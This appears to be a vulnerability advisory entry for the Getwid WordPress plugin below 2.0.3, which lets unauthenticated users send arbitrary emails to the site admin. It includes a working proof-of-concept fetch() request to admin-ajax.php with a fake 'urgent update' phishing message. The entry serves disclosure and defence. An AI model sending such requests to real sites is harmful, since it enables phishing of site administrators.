wpvulndb | Krzysztof Zając (CERT PL) | WPVDB-ID: 56A1C050-67B5-43BC-B5B6-28D9A5A59EBA
History: Dec 16, 2023 - 12:00 a.m.

Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin

2023-12-16 00:00:00
Krzysztof Zając (CERT PL)
wpscan.com
Tags: unauthenticated user access, arbitrary email sending, admin notification, content injection, security vulnerability, wordpress

AI Score: 6.6 Medium (Confidence: High)
EPSS: 0.001 Low (Percentile: 43.7%)

Description

Any unauthenticated user may send an e-mail from the site, with any subject or content, to the admin.

PoC

// Unauthenticated POST to the plugin's admin-ajax action; subject and message are caller-controlled.
fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=getwid_send_mail", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  // The nonce value is in the page source under the recaptcha_v2_contact_form key,
  // so it is available to unauthenticated visitors and does not act as an access control.
  "body": "data[subject]=Urgent WordPress update needs to be installed&data[message]=Fake notification for the admin with some link to be clicked&security=4c71dae953",
  "method": "POST",
});

CPE
Name | Operator | Version
     | eq       | 2.0.3

